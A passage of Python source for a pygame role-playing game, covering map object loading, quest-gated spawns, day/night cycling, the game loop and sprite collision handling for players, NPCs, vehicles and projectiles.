self.map.tmxdata.get_tile_locations_by_gid(block_tile):\n # block_type = choice(choices(BLOCK_LIST, BLOCK_PROB, k = 10))\n # center = vec(location[0] * self.map.tile_size + self.map.tile_size/2, location[1] * self.map.tile_size + self.map.tile_size/2)\n # block = Breakable(self, center, self.map.tile_size, self.map.tile_size, block_type)\n # hits = pg.sprite.spritecollide(block, self.walls, False) # Kills walls blocks spawn on top of.\n # for hit in hits:\n # if hit != hit.trunk:\n # hit.kill()\n\n for tile_object in self.map.tmxdata.objects:\n if tile_object.name:\n obj_center = vec(tile_object.x + tile_object.width / 2, tile_object.y + tile_object.height / 2)\n # These are paths for the AIs to follow.\n # if tile_object.name in AIPATHS:\n # AIPath(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height, tile_object.name)\n # It's super important that all elevations spawn before the player and mobs.\n if 'EL' in tile_object.name:\n try:\n _, elev, climb = tile_object.name.split('_')\n climb = eval(climb)\n except:\n _, elev = tile_object.name.split('_')\n climb = False\n elev = int(elev)\n Elevation(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height, elev, climb)\n if tile_object.name == 'jumpable':\n elev = Elevation(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height, 0, False, 'jumpable')\n if tile_object.name == 'climbable':\n Elevation(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height, 0, False, 'climbable')\n if tile_object.name == 'player':\n self.player.pos = vec(obj_center)\n self.player.rect.center = self.player.pos\n\n if not self.sprite_data.visited: # Only executes if you have never been to this map before. 
Otherwise it pulls the data from the stored list.\n # Loads NPCs from NPC_TYPE_LIST\n for npc_type in NPC_TYPE_LIST:\n if tile_object.name in eval(npc_type.upper()):\n if npc_type == 'animals':\n Animal(self, obj_center.x, obj_center.y, tile_object.name)\n else:\n if self.is_living(tile_object.name):\n Player(self, obj_center.x, obj_center.y, tile_object.name)\n # Loads vehicles\n for vehicle in VEHICLES:\n if vehicle == tile_object.name:\n Vehicle(self, obj_center, vehicle)\n # Loads items, weapons, and armor placed on the map\n if tile_object.name in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[tile_object.name])\n # Loads fixed rotated items:\n if '@' in tile_object.name:\n item, rot = tile_object.name.split('@')\n rot = int(rot)\n if item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[item], rot)\n # Used for destructible plants, rocks, ore veins, walls, etc\n \"\"\"\n for item in BREAKABLES:\n if item in tile_object.name:\n size = None\n if '@' in tile_object.name:\n temp_item, rot = tile_object.name.split('@')\n rot = int(rot)\n else:\n rot = None\n if 'SZ' in tile_object.name:\n size, temp_item = tile_object.name.split('SZ')\n Breakable(self, obj_center, tile_object.width, tile_object.height, item, rot, size)\"\"\"\n\n # Loads detectors used to detect whether quest items have been delivered to the correct locations.\n if 'detector' in tile_object.name: # These are invisible objects used to detect other objects touching them.\n Detector(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height, tile_object.name)\n # Loads items/npcs that only appear after their corresponding quests are completed.\n if 'QC' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if self.quests[quest]['completed']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n # Loads items/npcs that should only be there if a quest hasn't been completed\n if 'QU' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if not self.quests[quest]['completed']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n # Loads items/npcs that only appear after a quest has been accepted.\n if 'QA' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if self.quests[quest]['accepted']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n # Loads items/npcs that should only be there if a quest hasn't been accepted\n if 'QN' in tile_object.name:\n _, quest, quest_item = tile_object.name.split('_')\n if not self.quests[quest]['accepted']:\n if quest_item in VEHICLES:\n Vehicle(self, obj_center, quest_item)\n if quest_item in 
self.animals_dict:\n Animal(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in self.people:\n if self.is_living(quest_item):\n Player(self, obj_center.x, obj_center.y, quest_item)\n if quest_item in ITEMS:\n Dropped_Item(self, obj_center, ITEMS[quest_item])\n if 'COMMAND' in tile_object.name: # I used this block of code for killing Alex's body: the character that the black wraith comes out of in the beginning.\n _, command, npc = tile_object.name.split('_')\n if npc != 'None':\n if self.is_living(npc):\n temp_npc = Player(self, obj_center.x, obj_center.y, npc)\n if command == 'kill':\n temp_npc.death()\n # if tile_object.name == 'fire':\n # Stationary_Animated(self, obj_center, 'fire')\n # if tile_object.name == 'shock':\n # Stationary_Animated(self, obj_center, 'shock')\n # if tile_object.name == 'charger':\n # Charger(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height)\n if tile_object.name == 'portal':\n self.portal_location = obj_center\n if 'firepot' in tile_object.name:\n number = tile_object.name[-1:]\n FirePot(self, obj_center, number)\n # if tile_object.name == 'wall':\n # Obstacle(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height)\n # if tile_object.name == 'light':\n # LightSource(self, tile_object.x, tile_object.y,\n # tile_object.width, tile_object.height)\n # if 'lightsource' in tile_object.name:\n # numvars = tile_object.name.count('_')\n # if numvars == 2:\n # _, kind, rot = tile_object.name.split('_')\n # elif numvars == 1:\n # _, kind = tile_object.name.split('_')\n # rot = 0\n # kind = int(kind)\n # if rot == 'R':\n # rot = 0\n # elif rot == 'U':\n # rot = 90\n # elif rot == 'L':\n # rot = 180\n # elif rot == 'D':\n # rot = 270\n # else:\n # rot = int(rot)\n # LightSource(self, tile_object.x, tile_object.y,\n # tile_object.width, tile_object.height, kind, rot)\n # if tile_object.name == 'inside':\n # Inside(self, tile_object.x, tile_object.y,\n # tile_object.width, tile_object.height)\n if tile_object.name == 'nospawn':\n NoSpawn(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height)\n # if tile_object.name == 'electric entry':\n # ElectricDoor(self, tile_object.x, tile_object.y, tile_object.width, tile_object.height)\n # if 'entryway' in tile_object.name: # Used for animated doors that can be opened, closed or locked.\n # numvars = tile_object.name.count('_')\n # if numvars == 0:\n # entryway = Entryway(self, tile_object.x, tile_object.y)\n # elif numvars == 1:\n # _, orientation = tile_object.name.split('_')\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation)\n # elif numvars == 2:\n # _, orientation, kind = tile_object.name.split('_')\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation, kind)\n # elif numvars == 3:\n # _, orientation, kind, name = tile_object.name.split('_')\n # locked = eval(locked)\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation, kind, name)\n # elif numvars == 4:\n # _, orientation, kind, name, locked = tile_object.name.split('_')\n # locked = eval(locked)\n # entryway = Entryway(self, tile_object.x, tile_object.y, orientation, kind, name, locked)\n if 'door' in tile_object.name: # This block of code positions the player at the correct door when changing maps\n door = Door(self, tile_object.x, tile_object.y,\n tile_object.width, tile_object.height, tile_object.name)\n if self.previous_map[3:][:-4] == door.name[4:]:\n # This sets up the direction vector which has x and y values of 1 but the signs tell 
what direction the player was last heading. So the player will appear on the correct side of the door.\n direction_x = vec(self.player.direction.x, 0).normalize()\n direction_y = vec(0, self.player.direction.y).normalize()\n direction_vector = vec(direction_x.x, direction_y.y)\n if door.rect.width > 512: # For wide doors/connection points to other maps. This makes it so the player appears in the correct x position on the map\n self.player.pos.y = door.rect.y + (direction_vector.y * self.map.tile_size)\n self.player.rect.center = self.player.pos\n elif door.rect.height > 512: # For wide doors/connection points to other maps. This makes it so the player appears in the correct y position on the map\n self.player.pos.x = door.rect.x + (direction_vector.x * self.map.tile_size)\n self.player.rect.center = self.player.pos\n else:\n self.player.pos = vec(obj_center) + direction_vector * 64\n self.player.rect.center = self.player.pos\n\n try:\n if 'maptype' in tile_object.name:\n self.map_type = tile_object.name[8:]\n except:\n pass\n\n # Generates trees\n # if len(self.breakable) < 1:\n # for y in range(0, self.map.tiles_high):\n # for x in range(0, self.map.tiles_wide):\n # props = self.map.tmxdata.get_tile_properties(x, y, self.river_layer)\n # if props == None:\n # pass\n # elif 'stump' in props:\n # tree = props['stump']\n # Breakable(self, vec(x * TILESIZE + TILESIZE / 2, y * TILESIZE + TILESIZE / 2), TILESIZE, TILESIZE, tree)\n\n #gids = []\n #for gid, props in self.map.tmxdata.tile_properties.items():\n # if props and ('stump' in props):\n # gids.append(gid)\n #for gid in gids:\n # for x, y, layer in self.map.tmxdata.get_tile_locations_by_gid(gid):\n # Breakable(self, vec(x * TILESIZE + TILESIZE / 2, y * TILESIZE + TILESIZE / 2), TILESIZE, TILESIZE, tree)\n\n\n # Generates random drop items\n \"\"\"\n if self.map_type in ['mountain', 'forest', 'grassland', 'desert', 'beach']:\n for i in range(0, randrange(1, 15)):\n for item in ITEMS:\n if 'random drop' in ITEMS[item].keys():\n if randrange(0, ITEMS[item]['random drop']) < 2:\n centerx = randrange(200, self.map.width - 200)\n centery = randrange(200, self.map.height - 200)\n center = vec(centerx, centery)\n Dropped_Item(self, center, 'items', item)\"\"\"\n\n # Generates random animals/Npcs on maps that don't have existing animals on them. 
The type of animal depends on the maptype object in the tmx file.\n if (len(self.mobs) - len(self.companions)) < 4:\n if self.map_type:\n for i in range(0, randrange(10, 30)):\n animal = choice(list(eval(self.map_type.upper() + '_ANIMALS')))\n centerx = randrange(200, self.map.width - 200)\n centery = randrange(200, self.map.height - 200)\n if animal in self.people:\n npc = Player(self, centerx, centery, animal)\n # checks for NPCs that spawn in walls and kills them\n hits = pg.sprite.spritecollide(npc, self.walls, False)\n if hits:\n npc.kill()\n\n else:\n anim = Animal(self, centerx, centery, animal)\n # checks for animals that spawn in walls and kills them.\n hits = pg.sprite.spritecollide(anim, self.walls, False)\n if hits:\n anim.kill()\n\n # Kills breakables that spawn in water or no spawn areas.\n hits = pg.sprite.groupcollide(self.breakable, self.nospawn, False, False)\n for hit in hits:\n hit.trunk.kill()\n hit.kill()\n #hits = pg.sprite.groupcollide(self.breakable, self.water, False, False)\n #for hit in hits:\n # hit.trunk.kill()\n # hit.kill()\n #hits = pg.sprite.groupcollide(self.breakable, self.shallows, False, False)\n #for hit in hits:\n # hit.trunk.kill()\n # hit.kill()\n #hits = pg.sprite.groupcollide(self.breakable, self.long_grass, False, False)\n #for hit in hits:\n # hit.trunk.kill()\n # hit.kill()\n\n\n # check for fish out of water and kills them\n #hits = pg.sprite.groupcollide(self.animals, self.water, False, False)\n #for animal in self.animals:\n # if 'fish' in animal.kind['name']:\n # if animal not in hits:\n # animal.death(True)\n # if 'shark' in animal.kind['name']:\n # if animal not in hits:\n # animal.death(True)\n\n # Adds all players and companions\n #self.group.add(self.player.body)\n #for sprite in self.companions:\n # if sprite not in self.animals:\n # self.group.add(sprite.body)\n # else:\n # self.group.add(sprite)\n # Adds vehicles back to group\n #if self.player.in_vehicle:\n # self.group.add(self.player.vehicle)\n # if self.player.vehicle.cat == 'tank':\n # self.group.add(self.player.vehicle.turret)\n self.sprite_data.visited = True\n self.previous_map = current_map\n self.respawn = False\n if self.new_game:\n self.new_game = False\n\n # Starts music based on map\n if self.map_type is None:\n self.bg_music = BG_MUSIC\n else:\n self.bg_music = eval(self.map_type.upper() + '_MUSIC')\n if self.bg_music != self.previous_music: # Only starts new music if the type of map changes\n self.previous_music = self.bg_music\n pg.mixer.music.fadeout(300)\n pg.mixer.music.load(path.join(music_folder, self.bg_music))\n pg.mixer.music.play(loops=-1)\n\n # sets up NPC target list for map\n self.target_list = [self.random_targets, self.work_stations, self.moving_targets, self.aipaths]\n for i, x in enumerate(self.target_list): # Replaces empty sprite groups with the random targets group; assigning to the loop variable alone would not update the list.\n if not list(x):\n self.target_list[i] = self.random_targets\n\n self.clock.tick(FPS) # resets dt\n\n\n def run(self):\n # game loop - set self.playing = False to end the game\n self.playing = True\n self.beg = perf_counter()\n while self.playing:\n self.events()\n if not self.paused:\n self.update()\n self.draw()\n\n def quit(self):\n pg.quit()\n sys.exit()\n\n def night_transition(self):\n now = pg.time.get_ticks()\n if now - self.last_darkness_change > NIGHTFALL_SPEED:\n self.darkness += 1\n self.last_darkness_change = now\n if self.darkness > MAX_DARKNESS:\n self.darkness = MAX_DARKNESS\n self.day_start_time = now\n self.night = True\n self.nightfall = False\n #color_val = 255 - self.darkness\n self.dark_color = (self.darkness, self.darkness, self.darkness)
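\n\n # How self.dark_color is consumed is outside this excerpt; a minimal sketch of the usual pygame approach (assumed here, not this project's confirmed draw code) is to fill the pre-built self.fog surface and multiply-blit it, so lower channel values darken the frame uniformly:\n # self.fog.fill(self.dark_color)\n # self.screen.blit(self.fog, (0, 0), special_flags=pg.BLEND_MULT)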
\n\n def day_transition(self):\n now = pg.time.get_ticks()\n if now - self.last_darkness_change > NIGHTFALL_SPEED:\n self.darkness -= 1\n self.last_darkness_change = now # Mirrors night_transition(); otherwise the fade runs every frame instead of at NIGHTFALL_SPEED intervals.\n if self.darkness < 0:\n self.darkness = 0\n self.day_start_time = now\n self.night = False\n self.sunrise = False\n #color_val = 255 - self.darkness\n self.dark_color = (self.darkness, self.darkness, self.darkness)\n\n def update(self):\n # update portion of the game loop\n # Controls the day turning to night and vice versa\n now = pg.time.get_ticks()\n if self.night:\n if now - self.day_start_time > NIGHT_LENGTH:\n self.sunrise = True\n self.day_transition()\n elif now - self.day_start_time > DAY_LENGTH:\n self.nightfall = True\n self.night_transition()\n if now - self.last_mobhp_update > MOB_HEALTH_SHOW_TIME: # Turns off the mob hp bar when you aren't attacking the mob.\n self.show_mobhp = False\n\n # updates all sprites that are on screen and puts on screen sprites into groups for hit checks.\n self.message_text = False\n # finds static sprites (ones you don't see) on screen.\n self.obstacles_on_screen.empty()\n self.walls_on_screen.empty()\n self.barriers_on_screen.empty()\n self.elevations_on_screen.empty()\n self.climbs_on_screen.empty()\n self.inside_on_screen.empty()\n for sprite in self.all_static_sprites:\n if self.on_screen(sprite, 400):\n if sprite in self.obstacles:\n self.obstacles_on_screen.add(sprite)\n if sprite in self.walls:\n self.walls_on_screen.add(sprite)\n self.barriers_on_screen.add(sprite)\n elif sprite in self.elevations:\n self.elevations_on_screen.add(sprite)\n self.barriers_on_screen.add(sprite)\n if sprite in self.climbs:\n self.climbs_on_screen.add(sprite)\n elif sprite in self.inside:\n self.inside_on_screen.add(sprite)\n\n # dynamic sprites on screen\n self.vehicles_on_screen.empty()\n #self.entryways_on_screen.empty()\n #self.electric_doors_on_screen.empty()\n self.breakable_on_screen.empty()\n self.corpses_on_screen.empty()\n self.dropped_items_on_screen.empty()\n self.fires_on_screen.empty()\n self.mobs_on_screen.empty()\n self.npcs_on_screen.empty()\n self.npc_bodies_on_screen.empty()\n self.animals_on_screen.empty()\n self.moving_targets_on_screen.empty()\n self.sprites_on_screen.empty()\n self.lights_on_screen.empty()\n for sprite in self.all_sprites:\n if self.on_screen(sprite):\n self.sprites_on_screen.add(sprite)\n # if sprite in self.entryways:\n # self.entryways_on_screen.add(sprite)\n # if sprite in self.electric_doors:\n # self.electric_doors_on_screen.add(sprite)\n if sprite in self.vehicles:\n self.vehicles_on_screen.add(sprite)\n if sprite in self.walls:\n self.walls_on_screen.add(sprite)\n elif sprite in self.fires:\n self.fires_on_screen.add(sprite)\n elif sprite in self.breakable:\n self.breakable_on_screen.add(sprite)\n elif sprite in self.corpses:\n self.corpses_on_screen.add(sprite)\n elif sprite in self.dropped_items:\n self.dropped_items_on_screen.add(sprite)\n elif sprite in self.npc_bodies:\n self.npc_bodies_on_screen.add(sprite)\n elif sprite in self.moving_targets:\n self.moving_targets_on_screen.add(sprite)\n if sprite in self.mobs:\n self.mobs_on_screen.add(sprite)\n if sprite in self.animals:\n self.animals_on_screen.add(sprite)\n elif sprite in self.npcs:\n self.npcs_on_screen.add(sprite)\n elif self.on_screen(sprite, 200):\n if sprite in self.lights:\n self.lights_on_screen.add(sprite)\n elif sprite in self.bullets: # Kills bullets not on screen.\n sprite.kill()\n elif sprite == self.player.vehicle:\n sprite.update()\n elif sprite in self.companions:\n sprite.update()\n elif sprite in self.companion_bodies:\n sprite.update()
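\n\n # on_screen() is defined outside this excerpt; judging from the margin argument used above, it is assumed to be a camera-rect culling test along these lines (attribute names hypothetical):\n # def on_screen(self, sprite, margin=0):\n # return self.camera.rect.inflate(margin, margin).colliderect(sprite.rect)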
\n self.sprites_on_screen.update()\n self.camera.update(self.player)\n self.group.center(self.player.rect.center)\n\n # Kills certain off screen sprites\n for corpse in self.corpses:\n if corpse not in self.corpses_on_screen:\n corpse.kill()\n\n ## Used for playing fire sounds at set distances:\n #closest_fire = None\n #previous_distance = 30000\n #for sprite in self.fires_on_screen: # Finds the closest fire and ignores the others.\n # player_dist = self.player.pos - sprite.pos\n # player_dist = player_dist.length()\n # if previous_distance > player_dist:\n # closest_fire = sprite\n # previous_distance = player_dist\n\n #if closest_fire:\n # if previous_distance < 400: # This part makes it so the fire volume decreases as you walk away from it.\n # volume = 150 / (previous_distance * 2 + 0.001)\n # self.channel4.set_volume(volume)\n # if not self.channel4.get_busy():\n # self.channel4.play(self.effects_sounds['fire crackle'], loops=-1)\n # else:\n # self.channel4.stop()\n #else:\n # self.channel4.stop()\n\n # The following are hit checks between moving objects. All tile-based hit checks are done in the sprites.py module using each sprite's tile_props/next_tile_props.\n # These hit checks only happen if the player isn't in a flying vehicle.\n if self.player not in self.flying_vehicles:\n\n # player hits portal\n hits = pg.sprite.spritecollide(self.player, self.portals, False, pg.sprite.collide_circle_ratio(0.35))\n if hits:\n now = pg.time.get_ticks()\n if now - hits[0].spawn_time > 1500: # Makes it so you can see the portal appear before it transfers you to a new map\n self.change_map(None, hits[0].coordinate, hits[0].location)\n\n # player hits entrance to other map\n hits = pg.sprite.spritecollide(self.player, self.doors, False)\n if hits:\n # Sets player's location on local map\n loc = hits[0].loc\n self.player.rect.center = (int(loc.x * self.map.tile_size), int(loc.y * self.map.tile_size))\n self.player.pos = vec(self.player.rect.center)\n self.change_map(None, None, None, hits[0].map)\n\n # player melee hits entryway (door)\n #if self.player.melee_playing:\n # hits = pg.sprite.spritecollide(self.player.body, self.entryways_on_screen, False, melee_hit_rect)\n # if hits:\n # if hits[0] in self.electric_doors_on_screen:\n # hits[0].gets_hit(40, 0, 0, 100, self.player)\n # else:\n # self.player.does_melee_damage(hits[0])
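\n\n # Note on the collision callbacks above: pg.sprite.collide_circle_ratio(r) returns a callable that collides circles derived from each sprite's rect (or its .radius attribute), scaled by r, so the 0.35 ratio makes a portal trigger only once the player is well inside it. Usage sketch:\n # hits = pg.sprite.spritecollide(self.player, self.portals, False, pg.sprite.collide_circle_ratio(0.35))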
' + pg.key.name(self.key_map['interact']).upper() + ' to unlock'\n            #        if self.player.e_down:\n            #            if not self.in_lock_menu:\n            #                self.in_lock_menu = self.in_menu = True\n            #                self.lock_menu = Lock_Menu(self, hits[0])\n            #            self.message_text = False\n            #            self.player.e_down = False\n            #    elif not hits[0].opened:\n            #        self.message = pg.key.name(self.key_map['interact']).upper() + ' to open'\n            #        if self.player.e_down:\n            #            hits[0].open = True\n            #            hits[0].close = False\n            #            self.message_text = False\n            #            self.player.e_down = False\n            #    elif hits[0].opened:\n            #        self.message = pg.key.name(self.key_map['interact']).upper() + ' to close'\n            #        if self.player.e_down:\n            #            hits[0].close = True\n            #            hits[0].open = False\n            #            self.message_text = False\n            #            self.player.e_down = False\n\n            # player hit corpse\n            hits = pg.sprite.spritecollide(self.player, self.corpses_on_screen, False)\n            if hits:\n                self.message_text = True\n                self.message = pg.key.name(self.key_map['interact']).upper() + \" to loot\"\n                if self.player.e_down:\n                    MainMenu(self, self.player, 'Looting', hits[0].inventory)\n                    self.message_text = False\n                    self.player.e_down = False\n\n            # Player is in talking range of NPC\n            if True not in [self.message_text, self.in_menu]:\n                hits = pg.sprite.spritecollide(self.player, self.npcs_on_screen, False, npc_talk_rect)\n                if hits:\n                    if hits[0].dialogue:\n                        if not self.in_dialogue_menu:\n                            now = pg.time.get_ticks()\n                            if now - self.last_dialogue > 2000:\n                                self.message_text = True\n                                self.message = pg.key.name(self.key_map['interact']).upper() + ' to talk'\n                                if self.player.e_down:\n                                    hits[0].ai.target = self.player\n                                    hits[0].talk_attempt = True\n                                    self.message_text = False\n                                    self.player.e_down = False\n                                    if self.dialogue_menu_npc:\n                                        self.dialogue_menu = Dialogue_Menu(self, self.dialogue_menu_npc)\n\n            # player hits elevation change\n            hits = pg.sprite.spritecollide(self.player, self.elevations_on_screen, False)\n            if hits:\n                keys = pg.key.get_pressed()\n                if keys[self.key_map['climb']]:\n                    if self.player.stats['stamina'] > 10 and not self.player.in_vehicle:\n                        self.player.climbing = True\n                else:\n                    if self.player.in_vehicle:\n                        if 'climbables' not in self.player.vehicle.collide_list:\n                            if 'obstacles' not in self.player.vehicle.collide_list:\n                                self.player.climbing = True\n            else:\n                self.player.climbing = False\n                if not self.player.jumping:\n                    if self.player.elevation > 1:\n                        self.player.falling = True\n                        self.player.pre_jump()\n                        self.player.elevation = 0\n\n            # player hits dropped item\n            hits = pg.sprite.spritecollide(self.player, self.dropped_items_on_screen, False, pg.sprite.collide_circle_ratio(0.75))\n            for hit in hits:\n                if hit.name not in ['fire pit']:\n                    self.message_text = True\n                    if self.message != \"You are carrying too much weight.\":\n                        self.message = pg.key.name(self.key_map['interact']).upper() + ' to pick up'\n                    if self.player.e_down:\n                        if self.player.add_inventory(hit.item):\n                            #self.player.calculate_weight()\n                            self.player.e_down = False\n                            self.message_text = False\n                            hit.kill()\n                        else:\n                            self.message = \"You are carrying too much weight.\"\n\n            # player melee hits breakable: a bush, tree, rock, ore vein, shell, glass, etc.\n            if self.player.melee_playing:\n                hits = pg.sprite.spritecollide(self.player.body, self.breakable_on_screen, False, breakable_melee_hit_rect)\n                for bush in hits:\n                    if self.player.equipped[self.player.weapon_hand] == None:\n                        weapon_type = None\n                    else:\n                        weapon_type = WEAPONS[self.player.equipped[self.player.weapon_hand]]['type']\n                        if not self.player.change_used_item('weapons', self.player.equipped[self.player.weapon_hand]): # 
Makes it so pickaxes and other items deplete their hp\n weapon_type = None\n bush.gets_hit(weapon_type)\n\n # player hits empty vehicle or mech suit\n if not self.player.in_vehicle:\n if self.player.possessing == None:\n hits = pg.sprite.spritecollide(self.player, self.mechsuits, False)\n if hits:\n if (hits[0].driver == None) and hits[0].living:\n self.message_text = True\n self.message = pg.key.name(self.key_map['interact']).upper() + \" to enter, T to exit\"\n if self.player.e_down:\n if hits[0].living:\n hits[0].possess(self.player)\n self.message_text = False\n self.player.e_down = False\n\n hits = pg.sprite.spritecollide(self.player, self.vehicles_on_screen, False, pg.sprite.collide_circle_ratio(0.95))\n if hits:\n if not hits[0].occupied and hits[0].living:\n self.message_text = True\n self.message = pg.key.name(self.key_map['interact']).upper() + ' to enter, ' + pg.key.name(self.key_map['dismount']).upper() + ' to exit'\n if self.player.e_down:\n if hits[0].living:\n hits[0].enter_vehicle(self.player)\n self.message_text = False\n self.player.e_down = False\n hits = pg.sprite.spritecollide(self.player, self.flying_vehicles, False)\n if hits:\n if not hits[0].occupied and hits[0].living:\n self.message_text = True\n if self.message != \"You need a key to operate this vehicle.\":\n self.message = pg.key.name(self.key_map['interact']).upper() + ' to enter, ' + pg.key.name(self.key_map['dismount']).upper() + ' to exit'\n if self.player.e_down:\n self.player.e_down = False\n if hits[0].living:\n if hits[0].kind == 'airship':\n if 'airship key' in self.player.inventory['items']:\n hits[0].enter_vehicle(self.player)\n self.message_text = False\n elif len(self.companions.sprites()) > 0:\n self.message_text = False\n is_felius = False\n for companion in self.companions:\n if companion.name == 'Felius':\n is_felius = True\n if is_felius:\n hits[0].enter_vehicle(self.player)\n else:\n self.message = \"You need a key to operate this vehicle.\"\n else:\n hits[0].enter_vehicle(self.player)\n else:\n self.player.swimming = False\n self.player.in_shallows = False\n self.player.in_grass = False\n\n\n \"\"\"\n #Moving into Player class into the melee def. 
It makes way more sense to check hits in there.\n # NPC or Player melee hits moving_target\n hits = pg.sprite.groupcollide(self.npc_bodies_on_screen, self.moving_targets_on_screen, False, False, melee_hit_rect)\n for body in hits:\n if body.mother.in_player_vehicle:\n pass\n for mob in hits[body]:\n if mob.immaterial:\n if body.mother.equipped[body.mother.weapon_hand]:\n if ('aetherial' not in body.mother.equipped[body.mother.weapon_hand]) or ('plasma' not in body.mother.equipped[body.mother.weapon_hand]):\n continue\n if mob.in_player_vehicle:\n continue\n elif body.mother == mob:\n continue\n elif mob in self.flying_vehicles:\n continue\n elif mob.in_vehicle:\n continue\n elif body.mother.in_vehicle: # Makes it so you can't attack your own vehicle\n if mob == body.mother.vehicle:\n continue\n if body.mother.melee_playing:\n if body.mother == self.player:\n if mob not in self.companions:\n mob.offensive = True\n mob.provoked = True\n if body.mother == self.player.possessing:\n if mob not in self.companions:\n mob.offensive = True\n mob.provoked = True\n body.mother.does_melee_damage(mob)\n \"\"\"\n\n # fire hit moving target\n hits = pg.sprite.groupcollide(self.moving_targets, self.fires_on_screen, False, False, pg.sprite.collide_circle_ratio(0.5))\n for mob in hits:\n if mob in self.occupied_vehicles:\n pass\n elif mob.in_vehicle:\n pass\n elif mob.in_player_vehicle:\n pass\n else:\n if 'dragon' not in mob.equipped['race']:\n if 'wyvern' not in mob.equipped['race']:\n for fire in hits[mob]:\n mob.gets_hit(fire.damage, 0, mob.rot - 180)\n\n # explosion hit moving target\n hits = pg.sprite.groupcollide(self.moving_targets, self.explosions, False, False, pg.sprite.collide_circle_ratio(0.5))\n for mob in hits:\n if mob in self.occupied_vehicles:\n pass\n elif mob.in_vehicle:\n pass\n elif mob.in_player_vehicle:\n pass\n else:\n for fire in hits[mob]:\n mob.gets_hit(fire.damage, 0, mob.rot - 180)\n\n # fireball hit moving target\n hits = pg.sprite.groupcollide(self.moving_targets, self.fireballs, False, False, fire_collide)\n for mob in hits:\n for bullet in hits[mob]:\n if mob in self.occupied_vehicles:\n if bullet.mother == mob.driver: # Ignores fireballs from driver\n pass\n elif bullet.mother in self.companions:\n pass\n elif mob.driver == self.player:\n if bullet.mother in self.player_group:\n pass\n else: # When enemy fireballs hit vehicle player is in.\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n bullet.explode(mob)\n else: # When fireball hits non player vehicle\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n bullet.explode(mob)\n elif bullet.mother != mob:\n if not mob.in_player_vehicle:\n if bullet.mother == self.player:\n mob.provoked = True\n mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n bullet.explode(mob)\n if bullet.mother == self.player:\n self.player.stats['marksmanship hits'] += 1\n\n # bullets hit moving_target\n hits = pg.sprite.groupcollide(self.moving_targets, self.bullets, False, False, pg.sprite.collide_circle_ratio(0.5))\n for mob in hits:\n for bullet in hits[mob]:\n if mob in self.occupied_vehicles:\n if bullet.mother == mob.driver: # Ignores bullet from driver that hit vehicle\n pass\n elif bullet.mother in self.companions:\n pass\n elif bullet.mother in self.turrets: # Ignores bullets from turrets of vehicle that's shooting\n if bullet.mother.mother == mob:\n pass\n elif mob.driver == self.player:\n if bullet.mother in self.player_group:\n pass\n else: # When enemy bullet hit vehicle player is in.\n mob.gets_hit(bullet.damage, 0, bullet.rot)\n 
bullet.death(mob)\n                        else: # When bullet hits non player vehicle\n                            mob.gets_hit(bullet.damage, 0, bullet.rot)\n                            bullet.death(mob)\n                    elif bullet.mother != mob:\n                        if not mob.immaterial or bullet.energy:\n                            if not mob.in_player_vehicle:\n                                if mob != self.player:\n                                    if bullet.mother == self.player: # Makes it so NPCs attack you if you shoot them.\n                                        #if mob.aggression in ['awd', 'sap', 'fup']:\n                                        #    mob.offensive = True\n                                        #    mob.provoked = True\n                                        mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n                                        self.hud_mobhp = mob.stats['health'] / mob.stats['max health']\n                                        self.show_mobhp = True\n                                        self.last_mobhp_update = pg.time.get_ticks()\n                                        bullet.death(mob)\n                                    else:\n                                        mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n                                        bullet.death(mob)\n                        else:\n                            if not mob.immaterial or bullet.energy:\n                                mob.gets_hit(bullet.damage, bullet.knockback, bullet.rot)\n                                bullet.death(mob)\n                                if bullet.mother == self.player:\n                                    mob.provoked = True\n                                    self.player.stats['marksmanship hits'] += 1\n\n\n\n        \"\"\"\n        # mob hit elevation object\n        hits = pg.sprite.groupcollide(self.mobs_on_screen, self.elevations_on_screen, False, False)\n        for mob in self.mobs_on_screen:\n            if mob in hits:\n                for elev in hits[mob]: # Makes it so NPCs can climb and jump.\n                    if elev.elevation - mob.elevation > 2:\n                        if (not mob.flying) and (mob in self.animals_on_screen):\n                            mob.hit_wall = True\n                            mob.last_wall_hit = pg.time.get_ticks()\n                            mob.seek_random_target()\n                        elif (mob in self.companions) or mob.target == self.player:\n                            mob.running = False\n                            mob.climbing = True\n                            mob.last_climb = pg.time.get_ticks()\n                        elif mob in self.npcs_on_screen:\n                            chance = randrange(0, 600)\n                            if chance == 1:\n                                mob.climbing = True\n                            else:\n                                mob.hit_wall = True\n                                